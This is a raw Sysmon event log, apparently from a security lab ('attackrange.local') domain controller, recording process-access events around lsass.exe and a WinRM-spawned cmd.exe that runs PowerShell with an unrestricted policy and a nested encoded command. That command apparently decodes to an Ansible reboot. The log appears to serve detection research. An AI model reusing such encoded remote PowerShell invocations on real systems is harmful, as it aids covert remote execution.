13:33:21.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.466{59A5CD1D-8C95-6005-0500-00000000A201}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E21-6005-D602-00000000A201}4132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.466{59A5CD1D-8E20-6005-D202-00000000A201}2340740C:\Windows\system32\WinrsHost.exe{59A5CD1D-8E21-6005-D602-00000000A201}4132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.479{59A5CD1D-8E21-6005-D602-00000000A201}4132C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E20-6005-E7C2-100000000000}0x10c2e70HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E20-6005-D202-00000000A201}2340C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.466{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.466{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.466{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.435{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.435{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.435{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.966{59A5CD1D-8E15-6005-B802-00000000A201}4560c.f.f.c.4.5.d.0.2.5.d.0.d.6.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa.0type: 12 win-dc-495.attackrange.local;C:\Windows\sysmon64.exe 10341000x8000000000000000487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.263{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA6-6005-0B00-00000000A201}876C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.263{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA6-6005-0B00-00000000A201}876C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.263{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1600-00000000A201}1528C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.091{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E21-6005-D502-00000000A201}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.091{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E21-6005-D502-00000000A201}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.044{59A5CD1D-8E21-6005-D502-00000000A201}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ky0to2pa.ryg.ps12021-01-18 13:33:21.044 10341000x8000000000000000481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.044{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E21-6005-D502-00000000A201}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.028{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.028{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.028{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+5179